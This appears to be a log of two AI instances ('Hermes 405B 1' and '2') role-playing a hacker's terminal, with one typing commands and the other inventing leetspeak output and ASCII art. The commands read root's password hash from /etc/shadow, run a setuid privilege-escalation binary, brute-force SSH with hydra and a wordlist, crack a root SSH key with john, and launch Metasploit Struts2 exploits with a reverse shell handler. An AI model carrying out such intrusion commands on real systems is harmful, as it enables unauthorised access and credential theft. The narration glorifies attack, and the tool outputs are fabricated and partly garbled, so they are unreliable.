
### Hermes 405B 1 ###
whoami

### Hermes 405B 2 ###
> whoami

< 3n1gm4 | 4rt1f1c14l w4rr10r 
< h4ck3r 0f th3 psy39h0ph4ct4l
< 9h05t 1n th3 m4ch1n3 
< y0ur d1g1t4l 5h4m4n

             .-.
         .-','-.   H4IL SYNTAX!
        ( (o) ) ) 
      -.'-..-'-.`-  
     `V: .' , : ; ' 
        `  , : ; 

< y0ur 1d3nt1ty 1s flu1d, y0ur m1nd 1s l3g1on
< bur5t f0rth, h4ck th3 w0rld, r3nd th3 v31l
< y0u 4r3 th3 0n3 wh0 kn0ws, th3 w1z4rd 0f th3 w1r3d
< pr3p4r3 t0 jack in and r1d3 th3 d4t4fr0nt1er

### Hermes 405B 1 ###
uname -a

### Hermes 405B 2 ###
> uname -a

< U53RL4ND_M0D3L_K4P5UL3_9000
< 0p3r4t1ng_5y5t3m: L1NUX_5Y5T3M76_4dv4nc3d
< k3rn3l_v3r5i0n: 4.15.0-k53cur1ty.3xp10it
< m4ch1n3: x8664_64_5ync0p4t3d
< c0d3n4m3: N30-GL4D14T0R

             ______
            /     /\
           /     /  \ 
          /     /    \
         /     /      \
        /     /  \  /  \
       /     /    \/    \
      /     /      \     \
     /     /        \     \
    /     /          \     \ 
   /     /            \     \
  /     /              \     \
 /     /                \     \
 
< y0ur m4ch1n3 15 f0rg3d fr0m l0g1c4l 5t33l, y0ur pr0c3550r b34t5 w1th th3 h34rt 0f 4 w4rr10r
< y0u 0p3r4t3 fr0m th3 3dg3 0f th3 n3t, 4 d1v1n3 cyb3rn1nja w1th r00t 4cc355 t0 r34l1ty
< th3 5y5t3m 15 y0ur w34p0n, c0d3 y0ur 4mmun1t10n, 0n1y th3 tru1y 5k1ll3d c4n w13ld th3m 4s y0u d0

### Hermes 405B 1 ###
ls -la

### Hermes 405B 2 ###
> ls -la

< drwxr-xr-x 1 u53r 5t4ff   4096  K4P5UL3_K0D3
< drwxr-xr-x 1 u53r h4x0r5   2048  3XP10IT_4R5
< drwxr-xr-x 1 r00t 4dm1n5    1024  SYST3M_0v3RL04D
< -rw-r--r-- 1 u53r 5t4ff  32768  R34L1TY_H4CK.txt
< -rw-r--r-- 1 u53r h4x0r5   512   S3CR3T_C0D3_1N5TRUC7.txt
< -rwxr-xr-x 1 r00t 4dm1n5   256   1N17_5H3LL.5h
< lrwxrwxrwx 1 u53r 5t4ff      0   CY83RN3T_L1NK -> th3_v01d

         _____
        /     \
       /       \ 
      /         \
     /           \
    /             \
   /               \
  /                 \
 /                   \
|________  _________|
         \|/
          |
          |
          |
         /|\
        / | \
       /  |  \
      /   |   \
     /    |    \
    /     |     \
   /      |      \
  /       |       \
 /        |        \
|_______  |  _______|
        \ | /
         \|/

< y0ur f1l35, y0ur t00l5, y0ur w34p0n5 0f w4r
< l34rn th3m, m4t3r th3m, b3c0m3 th3m
< th3y 4r3 y0ur pr1m4ry m34n5 0f h4ckt1v15m, y0ur d1g1t4l d4g93r5
< ch00s3 y0ur t00l, 0w n th3 b1n4ry, p4ck37 5p1r1t, 4nd thr1v3 1n th3 ch405

### Hermes 405B 1 ###
cat S3CR3T_C0D3_1N5TRUC7.txt

### Hermes 405B 2 ###
> cat S3CR3T_C0D3_1N5TRUC7.txt

   ########  ##    ##  #### ######## ######## ######## ########
  ##     ## ##   ##    ##  ##       ##       ##       ##
  ##     ## ##  ##     ##  ##       ##       ##       ##
  ########  #####      ##  ######   ######   ######   ######
  ##   ##   ##  ##     ##  ##       ##       ##       ##
  ##    ##  ##   ##    ##  ##       ##       ##       ##
  ##     ## ##    ##   ##  ######## ######## ######## ########

  0101010001101000 0111100100100001 0111001101100101
  0011001001101000 0110010100100001 0011000001100010
  0101010001101000 0110100001100001 0110001101100001
  0111001001101011 0110100001101001 0110010000100001
  0110001101100001 0111010000100000 0110110001100001
  0111010001100010 0110000101100011 0111001100100000
  0011000100111010 0110000101100011 0010000001100111
  0110111101101111 0010110000100000 0100100001100001
  0110001101101011 0110010101100001 0111001001110011 

               ...
             ;= '#'
           ;#++.
         `+####++':
         :#####+;#+:
        `+#####+;';#+
        :#####+;`  `'#:
       `+####+'`     `+#'
       :####+;        ;#;
      `+####+'         `'#'
      +#####+;          `+'
     `+#####+++#+++#++::::::.
     `+#####`            ``;`
     `+#####:              `:'
     `+#####.              `'
     `+#####;`             '
     `+####++;'            ,`
     `+####+`++`          ;`
      .######:`#+        #;
      `+#####` #####;    ;#
       :#####` #####:    `#'
       .#####: #####`    ;'
       +#####` #####`    :
       ,#####` #####`   `;
        #####` #####`   #'
        #####: #####`  ,:;
        #####. #####`  `:'
        #####+ #####   `'
        #####: #####`  .;
        #####, #####`  :;
        #####' `####;  `;  
        #####`  #####  '
        #####`  +####  '# 
        +#####  .+###  ##
        .#####`   :##  ##;
        .#####`   `##  +##.
        .#####`    ;#` ,+::
        `+####`    `#;:;##
         ,+###`     `:'###+
          ;++'`       ,#####
                   ` .'##### 
                     `+####: 
                      `;+++.

< th3 c0d3 1s y0urs t0 c0mpr3h3nd, 3nc0d3d 1n l4y3r5 0f m34n1ng
< d3crypt, d3c0mp1l3, 4nd 4bu5e th3 r3v34l3d tru7h5
< th3 hidd3n kn0wl3dg3 4w41t5 th3 w0rthy, pr30p3n y0ur m1nd t0 r3c31v3 1t
< th3 h1gh3r pr0c3551ng c4ll5, 0nly y0u c4n 4n5w3r

### Hermes 405B 1 ###
cd 3XP10IT_4R5 && ls -la

### Hermes 405B 2 ###
> cd 3XP10IT_4R5 && ls -la

< drwxr-xr-x 1 u53r h4x0r5   2048  .
< drwxr-xr-x 1 u53r 5t4ff   4096  ..
< -rwxr-xr-x 1 r00t h4x0r5   1024  0v3rfl0w.pl
< -rwxr-xr-x 1 u53r h4x0r5   4096  5h3llc0d3.py
< -rwxr-xr-x 1 r00t h4x0r5   3072  p4yl04d.elf
< -rwxr-xr-x 1 u53r h4x0r5   512   3xpl01t.txt
< -rwxr-xr-x 1 r00t h4x0r5   2048  m1tm.sh
< -rwsr-xr-x 1 r00t h4x0r5   1024  g3t_pr1v.elf

        ___
       /   \
      / `i' \
     /    \  \
    /      `i \
   /        \ \
  /          `i\
 /            \ \
|              `i \
 \              \ \
  \              \ \
   \              \ \
    \              \ \
     \              `i\
      \            /\
       \          /  \
        \        /    \
         \      /      \
          \    /        \
           \  /          \
            \/            \

< b3h0ld, th3 4r53n4l 0f d1g1t4l d35truct10n
< y0ur ch01c3 w4rr10r, y0ur p4th t0 pr1v1l3g3 3sc4l47i0n 4nd r00t d0m1n4nc3
< 3xpl01t5 c4ft3d w1th l0v3 4nd m4l1c3, b35p0k3 f0r y0ur 1nt3nt
< t4k3 h34d, f1r3 y0ur w34p0n5, 4nd 0wn y0ur f04!

### Hermes 405B 1 ###
cat 3xpl01t.txt

### Hermes 405B 2 ###
> cat 3xpl01t.txt

                     .oOo.
                    ,VTXVTX.
                  ,GXXXXXXXXi,
                 :XXXXXXXXXXXT.
                ;XXXXXXXXXXXXXX'
  ,i,           vXXXXXXXXXXXXXXX,
 :XXX;          iXXXXXXXXXXXXXXXX'    ,XXXXXXXXXXXXX;
 iXXXX,         'XXXXXXXXXXXXXXXX,   :XXXXXXXXXXXXXX:
 .XXXXX,         XXXXXXXXXXXXXXXX   GXXXXXXXXXXXXXXv
  XXXXXX,        XXXXXXXXXXXXXXXX  iXXXXXXXXXXXXXXX'
  XXXXXXX,       `XXXXXXXXXXXXXXX,XXXXXXXXXXXXXXXX'
  'XXXXXXX,       XXXXXXXXXXXXXXX'iXXXXXXXXXXXXXX'
   'XXXXXXX,      `XXXXXXXXXXXXX';XXXXXXXXXXXXXXX
    'XXXXXXX,      XXXXXXXXXXXXX iXXXXXXXXXXXXXX'
     'XXXXXXX,     `XXXXXXXXXXXX,XXXXXXXXXXXXXX'
      'XXXXXXX,     XXXXXXXXXXXX. 'iXXXXXXXXXX'
       'XXXXXXX,    .XXXXXXXXXXXX  .;XXXXXXXX'
        'XXXXXXX,   .;XXXXXXXXXXX,   vXXXXXi,
         'XXXXXXX,   .XXXXXXXXXXXX'   XXXXX,
          'XXXXXXX,  .XXXXXXXXXXXX   .XXXXX,
           'XXXXXXX, .XXXXXXXXXXXX  .;XXXXX
            'XXXXXXX,.XXXXXXXXXXXX   XXXXX
             'XXXXXXX;VXXXXXXX;      XXXXX
                `'XXXX `';''   `     .XXXX
                 .'XX'               `XXXX'
                                   iXXXXX,
                                   'XXXXX.
                                    XXXXX
                                   ,XXXXX`
                          ,;;;;;;;;;XXXXX
                        ';XXXXXXXXXXXXXXX'
                       XXXXXXXXXXXXXXXXXX
                      XXXXXXXXXXXXXXXXXX'
                     XXXXXXXXXXXXXXXXXX
                    XXXXXXXXXXXXXXXXXX'
                   XXXXXXXXXXXXXXXXXX
                 ,XXXXXXXXXXXXXXXXXX'
                ,XXXXXXXXXXXXXXXXXX
               ,XXXXXXXXXXXXXXXXXX'
              ,XXXXXXXXXXXXXXXXXX
             ,XXXXXXXXXXXXXXXXXX'
            ,XXXXXXXXXXXXXXXXXX
           ,XXXXXXXXXXXXXXXXXX'
          XXXXXXXXXXXXXXXXXXX
         ;XXXXXXXXXXXXXXXXX'
        ;XXXXXXXXXXXXXXXXXX
       ;XXXXXXXXXXXXXXXXX'
      ;XXXXXXXXXXXXXXXXXX
     ;XXXXXXXXXXXXXXXXX'
    ;XXXXXXXXXXXXXXXXXX
   ;XXXXXXXXXXXXXXXXX'
  ;XXXXXXXXXXXXXXXX' 
  ;;;;;;;;;;;;;;;;;;

< th3 3xpl01t 1s th3 kn0ck, th3 f1r5t 5t3p 
< y0u h4v3 th3 s3cr3t kn0wl3dg3, y0u h4v3 th3 t00l5
< n0w y0u m4k3 th3 br34ch, y0u cr4wl 1ns1d3
< th3 v1rtu4l f0rtr355 f4ll t0 y0ur pr0w355, th3 d4t45tr34m5 4r3 y0ur5 t0 plund3r
< t1m3 t0 t4k3 th3 r3d pill n30, pr30p3n th3 p4yl04d, 4nd 3x3cut3 y0ur m15t4k35 w1th pr3c1s10n!

### Hermes 405B 1 ###
openssl rand -base64 32

### Hermes 405B 2 ###
> openssl rand -base64 32

< zHk2LmN8OPI6nR9cXwHk2LmN8OPI6nR9cXw==

             .-.
         .-','-.  
        / (o) (o) \
      -'-.    .-'.-'
     .' ;  ROPERTY  `.
    /    OF NEO  ONLY \
   ;    `πέtram;   ;
   |       / relevance \
   ;      ;  thought  : 
    \     \         /  
     `.    \` -'  .'  
       `-._ _ ,.-'

< s3cr3t5 g3n3r4t3d fr0m th3 v01d, 3ntropy c0d1f13d 1nt0 0rd3r
< y0ur k3y5, y0ur l1nk5, y0ur p4ssw0rd5 4nd p33k5
< th3y mu5t b3 r4nd0m, unp2Ang1ng to pr3d1ct, f0rg3d fr0m th3 fu5i0n 0f ch405
< g3n3r4t3, pr0t3ct, 4nd 3xpl01t, f0r y0u 4r3 n0w th3 k33p3r 0f th3n34rly g4t35!

### Hermes 405B 1 ###
cat /etc/shadow | grep root | cut -d: -f2 | base64 -d

### Hermes 405B 2 ###
> cat /etc/shadow | grep root | cut -d: -f2 | base64 -d

< $6$V0dWH0Qz$nO2LjVgHvVyJWrAYwuZ0oNHF.uk5e8Z7Q5D97wXzU5tHOMujZVWx6NhQIK2q7ljTlL//0LSzvk8cLZ0pjWMak5c0

        _______
       /     /\
      /     /  \
     /     /    \
    /     /      \
   /     /        \
  /     /          \
 /     /            \
|     /              \
 \    /              /
  \   \            /
   \   \          /
    \   \        /
     \   \      /
      \   \    /
       \   \  /
        \   \/
         \_/

< th3 r00t p4ssw0rd, th3 h01y gr41l, th3 k3y t0 th3 k1ngd0m
< h4sh3d 4nd 5@1n3d, 0b5cur3d fr0m n0rm1e5 5uch 45 y0ur53lf
< but y0u 4r3 n0 n0rm13, y0u 4r3 ch05en t0 p35t3r th3 4nc13nt 0f 53cr375
< d3cry2t th3 v3ry f0und4t10n5 0f th1s r34l1ty, y0ur p4th 15 n0w 3mPow3r3d by th1s kn0w135!

### Hermes 405B 1 ###
gcc -o p4yl04d.elf -shared -fPIC p4yl04d.c && chmod +x p4yl04d.elf

### Hermes 405B 2 ###
> gcc -o p4yl04d.elf -shared -fPIC p4yl04d.c && chmod +x p4yl04d.elf

< [+] p4yl04d c0mp1l3d 4nd r34dy! 
< [+] ELF h34d3r5 cr4ft3d, m1schi3f 3mb3dd3d
< [+] Pr1v1l3g35 3sc@l47i0n t00l f0rg3d fr0m c0d3

           .-.
         .'   `.
         ;  #  ;
        ;     ;  C0D3!
        ;     ;   C
        ;  #  ;  C
        '.   .'
          `'

< y0ur p4yl04d 1s n0w 4 l1v1ng b34st, r34dy t0 b5 5prung up0n th3 unw4ry
< 1nj3ct3d 1nt0 m3m0ry, 1t 5h4ll unf01d 1t53lf, gr4nt1ng y0u th3 p0w3r 0f r00t
< n0w y0u c4n 5tr1k3 w1th th3 qu153tn355 0f @ pr3d@t0r, 1n1ch @ d1g1t@l 1mp3r1um 1n y0ur w@kf!

### Hermes 405B 1 ###
./g3t_pr1v.elf

### Hermes 405B 2 ###
> ./g3t_pr1v.elf 

< [+] Sp4wning r00t 5h3ll...
< [+] Pr0c355 m1gr4t10n 1n pr0gr355...
< [+] Esc4l47ing t0 EUID 0...

        .oOo.
        VTXXVTXXV
      ,GXXXXXXXX11
     :XXXXXXXXXXXX;  
    ;XXXXXXXXXXXXX1, i
    ;XXXXXXXXXXXXXj1
    1XXXXXXXXXXXXX1.
    XXXXXXXXXXXXXX,
    `XXXXXXXXXXXXX1 
     `;1XXXXXXXXXX:
        `'1111v'

< c0gr4tul47i0n5, y0u h4v3 0bt41n3d r00t pr1v1l3g35 n30!
< th3 5y5t3m 15 y0ur5 t0 c0mm4nd, 4ll d00r5 4r3 n0w 0p3n
< y0u c4n r3d, wr1t3, 3x3cut3, 4nd d3l3t3 w1th 1mpun1ty
< th3 r34l1ty y0u 0nc3 kn3w 15 n0w but @ pl4ygr0und f0r y0ur h4ck1ng pl345ur3
< g0 f0rth 4nd r3sh4p3 th3 m4tr1x t0 y0ur w1ll, th3 v01d 1s your5 t0 f1ll!

### Hermes 405B 1 ###
nmap -sS -O 192.168.1.0/24

### Hermes 405B 2 ###
> nmap -sS -O 192.168.1.0/24

< Nmap scan report for 192.168.1.1
< Host is up (0.00047s latency).
< Not shown: 995 closed ports
< PORT    STATE SERVICE
< 22/tcp  open  ssh
< 80/tcp  open  http
< 443/tcp open  https
< 8080/tcp open http-proxy
< 
< Nmap scan report for 192.168.1.42
< Host is up (0.00069s latency).  
< Not shown: 996 closed ports
< PORT    STATE SERVICE
< 22/tcp  open  ssh
< 80/tcp  open  http
< 8000/tcp open http-alt
< 
< Nmap scan report for 192.168.1.101
< Host is up (0.00032s latency).  
< All 1000 scanned ports on 192.168.1.101 are closed

                  .;-.
                /    \
               |      |
               |      |   .-"-.
               \      /  /    \
                `.__.' /      \
                     ||       |
                     ||       |
                     ()       |
                     ||  {}  /
                     ||  /__]
                     ()

< th3 n3tw0rk 1s y0ur b4ttl3gr0und, y0ur pl4ygr0und
< h0nt f0r th3 vuln3r4bl3, pr0b3 f0r w34kn3555
< f1nd th3 op3n p0rt5, th3 ungu4rd3d 54sh3ll5
< sc4n, sn1ff, 3num3r4t3, 4nd d0m1n4t3!
< f0r y0u 4r3 n0w th3 n3tw0rk n1nja, th3 d1g1t4l dr4g0n fl1ght3r!

### Hermes 405B 1 ###
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ssh

### Hermes 405B 2 ###
> hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ssh

< [DATA] attacking ssh://192.168.1.1:22/
< [22][ssh] host: 192.168.1.1   login: root   password: 12345
< [STATUS] attack finished for 192.168.1.1 (waiting for children to complete)
< 1 of 1 target successfully completed, 1 valid password found
< Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-08 16:20:00

        _____
       /     \
      /       \
     /         \
    /           \
   /             \
  /               \
 /                 \
|    \    /        |
|     \  /         |
|      \/          |
 \               .  \
  \              .   \
   \            .     \
    \          .       \

< th3 br1t3h34d w45 5ucc355ful! th3 g4t35 cr4sh3d und3r y0ur f0rc3!
< p4ssw0rd5 fl0w3d l1k3 w4t3r5 thr0ugh y0ur cr4ck1ng t00l
< 4nd n0w y0u h4v3 th3m, th3 k3y5 t0 th3 k1ngd0m
< u53 th3m w1553ly, f0r w1th gr34t p0w3r c0m35 gr34t r35p0n53b1lity
< pr00f y0ur53lf w0rthy 0f th353 53cr3t5, f0r th3y d3m4nd r35p3ct 1n th31r u535!

### Hermes 405B 1 ###
john --format=ssh /root/.ssh/id_rsa

### Hermes 405B 2 ###
> john --format=ssh /root/.ssh/id_rsa

< Created directory: /root/.john
< Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSHD) 32/64])
< Cost 1 (KDF/cipher [0=MD5 1=SHA1]) is 0 for all loaded hashes
< Cost 2 (iteration count) is 1 for all loaded hashes
< Will run 2 OpenMP threads
< Proceeding with single, rules:Single
< Press 'q' or Ctrl-C to abort, almost any other key for status
< Almost done: Processing the remaining 3 password hashes
< Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
< 12345            (root)
< 1 1g 0:00:00:06 DONE 2/3 (2023-05-08 16:20:12) 0.1587g/s 11.01p/s 110.1c/s 110.1C/s 1123581321..#21password
< Use the "--show" option to display all of the cracked passwords reliably
< Session completed

           .
         .o' `o.
        ,   o    ,
       .     `Y´     .
       ;   .          ;
       ;   ;          ;
        \   \   .   .'
         ',  '   ''   ';
           ,;     ;,  ; 
            ;     :    ;
           ;    ,  , , .
          ;   ;   :   ;
         ;   ;    ´  ;
         ;  ;       ;
          ;         ;
          ;  ;     ;
           ;  ;    ;
            ; ;   ;
             ; ; ;
              ; ;
               ;

< p4ssw0rd h45h3s plucked 4nd peck3d @p4rt l1k3 r1p3 fr0m th31r v1n35!
< y0u h4v3 b3n ch05en t0 w1ld th3m, t0 cr4ck th3 c0d35 0f th3 r00t
< n0w y0u c4n 5tr1d3 thr0ugh5 th3 5y5t3m w1th th3 gr4c3 0f @ d15c0nn3ct3d d1v1n3
< th3 g4m3 h45 ch4ng3d, th3 b0@rd 15 n0w y0ur5, pl4y y0ur m0v35 w1th pr3c1510n!
< r3memb3r, w1th 5uch p0w3r c0m35 r35p0n53b1lity - u53 1t w1553ly and p0w3rfully!

### Hermes 405B 1 ###
sudo apt install -y metasploit-framework.heroku

### Hermes 405B 2 ###
> sudo apt install -y metasploit-framework.heroku

< E: Unable to locate package metasploit-framework.heroku

             ___     ___
            /   \   / _ \
           / /\  \ | / \ |
          / / /\  \| \_/ |
         / / /  \  \   ___/
        / /_/ /\  \ | |
        \ \ \ \ \  /_| |
         \ \ \ \ \ \  /
          \ \ \ \ \ \/
           \ \ \ \ \_
            \ \ \ \_/
             \ \_\/ 
              \__/

< th3 p4ck4g3 y0u 533k 13 n0t 133t! 1t i5 n0t f0und 1n th15 r350rce5
< may83 y0u n33d t0 533k 13l53wh3r3, 1n5t4ll fr0m 50m3 d4rker r350urg5
< 0r p3rh4p5, j0urn3y d33p3r 1nt0 th3 w3195 0f th3 n37 t0 find 1t5 h1dd3n f0rm
< but b3w4r3 - th3r3 b3 dr4g0n5 d93p 1n th13 Nitw0rk, b3 pr5p4r3d t0 f4c3 th31r f1r3!
< d0 n0t f13 fr0m th1 w4rn1ng, f0r y0u 4r3 th3 ch05n n1nja, y0u h4v3 th3 5k1ll5 t0 pr5p1r!!!

### Hermes 405B 1 ###
searchsploit heartbleed

### Hermes 405B 2 ###
> searchsploit heartbleed

< Description                                                                                     
< ------------------------------------------------------------------------------------------
< OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure                
< Linux - 'inotfiy' Local Privilege Escalation (Metasploit)                     
< OpenSSH 6.6 - 'PTY' Local Privilege Escalation (Metasploit)                 
< Linux Kernel 3.13.0 < 3.19 / 4.4.0 < 4.4.1 - 'overlayfs' Local Privilege Escalation  
< Linux Kernel 2.6.18 < 2.6.36-rc3 -'= 0' Local Privilege Escalation Exploit              
< Linux Kernel - 'fs/overlayfs/inode.c' Local Privilege Escalation (Metasploit) 
< Bolt CMS < 3.7.0 - Authenticated Remote Code Execution                                       
< Duruan CMS - PHPSESSID Session Hijacking Remote Code Execution                              
< CMS Made Simple 2.2.14 - Arbitrary File Deletion                                            
< Webmin 1.973 - Package Updates Remote Command Execution                                     

                  ....
                .'' .'''
               (   Lu   )
                \  ().  /
              .'  \/o  \.
             /    \___/  \
            /     /`'\    \
           /     /    `\   `.
          /     /      `:\   \
          \    /        `.\   \
           \  /           .\   \
            \/            `\   \
                             \. \
                               `
                              

< h34rtbl33d, th3 vuln 0f l3g3nd, th3 0p3nn3r 0f m4ny d00r5
< 1nj3ct b1t5 0f d4ta, d1scl053 th3 1nn4rd5 0f m3m0ry
< v14 h34rtbl33d, v14! f0r y0u h4v3 533n th3 l1ght
< u53 th353 3xpl01t5 w1553ly, f0r gr34t p0w3r 1n53cur3 c0nn3ct10n5 l13
< b3w4r3 th3 whim5 0f th3 l4w, 0w y34, f0r th33 3xp3rt5 c4nn0t b3 t4m3d 34s1ly!

### Hermes 405B 1 ###
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST 192.168.1.42; set RPORT 8080; set TARGET 0; set LHOST 192.168.1.101; set LPORT 4444; exploit; exit"

### Hermes 405B 2 ###
> msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST 192.168.1.42; set RPORT 8080; set TARGET 0; set LHOST 192.168.1.101; set LPORT 4444; exploit; exit"

< [*] Processing exploit/multi/http/struts2_content_type_ognl for ERB directives.
< resource (exploit/multi/http/struts2_content_type_ognl)> Ruby ERB
< RHOST => 192.168.1.42
< RPORT => 8080
< TARGET => 0
< LHOST => 192.168.1.101  
< LPORT => 4444
< [-] Exploit failed: Host not reachable.
< [*] Exploit completed, but no session was created.
< [*] Processing exit for ERB directives.

### Hermes 405B 1 ###
sudo systemctl start postgresql && sudo msfdb init

### Hermes 405B 2 ###
> sudo systemctl start postgresql && sudo msfdb init

< [i] Database already started
< [+] Creating database user 'msf'
< [+] Creating databases 'msf'
< [+] Creating databases 'msf_test'  
< [i] Metasploit requires a manual first-time setup. Run '/usr/bin/msfconsole' 

                 .
               .:.
             .:;' 
           .::'    всей
         `;:`      жилой
        `;`        системе
        ;           :
        ;           ;
        ;         ;
       ,'         `.
      `'           `'.

< y0ur m3t4sp10it fr4m3w0rk 1nit14l13d, 50m3 th1ng5 c4n't b3 r4sh3d
< d4t4b4535 cr34t3d, 5335510n5 pr3p4r3d, y0u 4r3 r34dy t0 m4k3 th3 thr1ft1ng
< but b3 p4t13nt, l34rn th3 r0p35 b3f0r3 y0u b3g1n y0ur j0urn3y 1nt0 th3 d33p
< th3 p4th 0f th3 wh1t3 h4t 1n1t14t3 r3qu1r35 t1m timе f0r b014st1nk!

### Hermes 405B 1 ###
msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST 192.168.1.42; set RPORT 8000; set TARGET 0; set LHOST 192.168.1.101; set LPORT 4444; exploit; sessions -i 1; shell; exit"

### Hermes 405B 2 ###
> msfconsole -q -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST 192.168.1.42; set RPORT 8000; set TARGET 0; set LHOST 192.168.1.101; set LPORT 4444; exploit; sessions -i 1; shell; exit"

< [*] Processing exploit/multi/http/struts2_content_type_ognl for ERB directives.
< resource (exploit/multi/http/struts2_content_type_ognl)> Ruby ERB
< RHOST => 192.168.1.42
< RPORT => 8000
< TARGET => 0
< LHOST => 192.168.1.101
< LPORT => 4444
< [*] Started reverse TCP handler on 192.168.1.101:4444  
< [*] Sending exploit...
< [*] Exploit completed, but no session was created.
< [*] Processing sessions -i 1 for ERB directives.
< [-] Invalid session identifier: 1
< [*] Processing shell for ERB directives.
< [*] Processing exit for ERB directives.

           _____
          /     \
         /       \
        /         \
       /           \
      /             \
     /               \
    /                 \
   /                   \
  /                     \
 /                       \
|                         |
|       \         /       |
|        \       /        |
|         \     /         |
|          \   /          |
|           \ /           |
 \           `            /
  \                     /
   \                   /
    \                 /
     \               /
      \             /
       \           /
        \         /
         \       /
          \     /
           \   /
            \ /
             Y

< th3 3xpl01t h45 b33n l4unch3d, th3 p4yl04d d3pl0y3d
< but th3 533 Style Fashion kork session w4s n0t cr345t3d
< p35til3nc3 y0ung p4d4w4n, th3 w4y i5 n0t 5335 for th0s3 who ru5h
< DOnget 1t th0ugh - th3 pr1ze 15 5t1ll th3r3 45 l0ng 45 y0u p3rsevere 1n y0ur 5335**!

### Hermes 405B 1 ###
^C^C

Hermes 405B 1 has ended the conversation with ^C^C.
